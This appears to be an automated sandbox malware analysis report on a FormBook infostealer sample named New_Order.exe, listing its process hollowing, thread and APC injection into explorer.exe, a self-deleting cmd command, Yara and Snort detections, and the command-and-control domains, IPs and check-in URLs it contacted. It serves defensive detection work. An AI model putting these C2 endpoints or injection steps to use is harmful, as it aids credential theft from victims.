Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]	7_2_04894D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]	7_2_0489513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]	7_2_0489513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]	7_2_04873D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h]	7_2_0486AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h]	7_2_048EA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h]	7_2_048A3D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]	7_2_0488B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]	7_2_0488B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h]	7_2_048E3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h]	7_2_04887D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h]	7_2_0486C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]	7_2_0486B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]	7_2_0486B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]	7_2_0488C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]	7_2_0488C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h]	7_2_048FFE87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]	7_2_0489D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]	7_2_0489D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]	7_2_048652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h]	7_2_048E46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]	7_2_04930EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0487AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0487AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h]	7_2_0489FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h]	7_2_04892ACB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h]	7_2_04938ED6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048936CC mov eax, dword ptr fs:[00000030h]	7_2_048936CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h]	7_2_048A8EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h]	7_2_0491FEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h]	7_2_048776E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h]	7_2_048916E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h]	7_2_04892AE4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]	7_2_0486C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h]	7_2_04898E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h]	7_2_04878A0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]	7_2_0486AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]	7_2_0486AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h]	7_2_04883A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]	7_2_0489A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]	7_2_0489A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]	7_2_04865210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921608 mov eax, dword ptr fs:[00000030h]	7_2_04921608
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h]	7_2_0486E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]	7_2_048A4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]	7_2_048A4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h]	7_2_0491FE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]	7_2_04869240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]	7_2_04877E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h]	7_2_048F4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487766D mov eax, dword ptr fs:[00000030h]	7_2_0487766D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A927A mov eax, dword ptr fs:[00000030h]	7_2_048A927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]	7_2_0491B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]	7_2_0491B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h]	7_2_04938A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]	7_2_04871B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]	7_2_04871B8F

Enables debug privileges

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.charmboutiques.com
Source: C:\Windows\explorer.exe	Domain query: www.shanghainternational.com
Source: C:\Windows\explorer.exe	Network Connect: 91.148.168.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.voiceclubdubai.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.websitemax.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 8.210.40.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 150.95.255.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.roastedorganic.com
Source: C:\Windows\explorer.exe	Domain query: www.year-action.xyz
Source: C:\Windows\explorer.exe	Domain query: www.susanestuart.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.189.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.w-c727or.net
Source: C:\Windows\explorer.exe	Domain query: www.kantan-sedori.com
Source: C:\Windows\explorer.exe	Domain query: www.geacasolaro.com
Source: C:\Windows\explorer.exe	Domain query: www.hdjakdhf.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.233.160.22 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\New_Order.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\New_Order.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\New_Order.exe

0_2_00403348

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
75.2.115.196	www.roastedorganic.com	United States	16509	AMAZON-02US	true
62.149.189.71	www.geacasolaro.com	Italy	31034	ARUBA-ASNIT	true
91.148.168.141	voiceclubdubai.com	Bulgaria	31083	TELEPOINTBG	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
34.102.136.180	susanestuart.com	United States	15169	GOOGLEUS	false
85.233.160.22	fwd3.hosts.co.uk	United Kingdom	8622	ISIONUKNamescoLimitedGB	true
8.210.40.49	www.hdjakdhf.com	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
150.95.255.38	www.year-action.xyz	Japan	7506	INTERQGMOInternetIncJP	true

Contacted Domains

Name	IP	Active
www.roastedorganic.com	75.2.115.196	true
www.year-action.xyz	150.95.255.38	true
www.geacasolaro.com	62.149.189.71	true
voiceclubdubai.com	91.148.168.141	true
www.hdjakdhf.com	8.210.40.49	true
susanestuart.com	34.102.136.180	true
fwd3.hosts.co.uk	85.233.160.22	true
www.thelordnelsonwinthorpe.com	94.136.40.51	true
shops.myshopify.com	23.227.38.74	true
www.algaeflipflops.com	64.190.62.111	true
www.charmboutiques.com	unknown	unknown
www.shanghainternational.com	unknown	unknown
www.voiceclubdubai.com	unknown	unknown
www.websitemax.co.uk	unknown	unknown
www.susanestuart.com	unknown	unknown
www.w-c727or.net	unknown	unknown
www.kantan-sedori.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh	true	Avira URL Cloud: safe	unknown
http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp	true	Avira URL Cloud: safe	unknown
http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH	true	Avira URL Cloud: safe	unknown
http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT	true	Avira URL Cloud: safe	unknown
http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R	true	Avira URL Cloud: safe	unknown
http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT	true	Avira URL Cloud: safe	unknown
www.voiceclubdubai.com/icsm/	true	Avira URL Cloud: safe	low
http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: New_Order.exe	Virustotal: Detection: 38%			Perma Link
Source: New_Order.exe	ReversingLabs: Detection: 59%

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: New_Order.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.New_Order.exe.24e0000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.svchost.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: New_Order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: New_Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source:	Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,		0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004058BF

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop esi	1_2_0041581A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	1_2_0040C3EA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi	7_2_0062581A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi	7_2_0061C3EA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
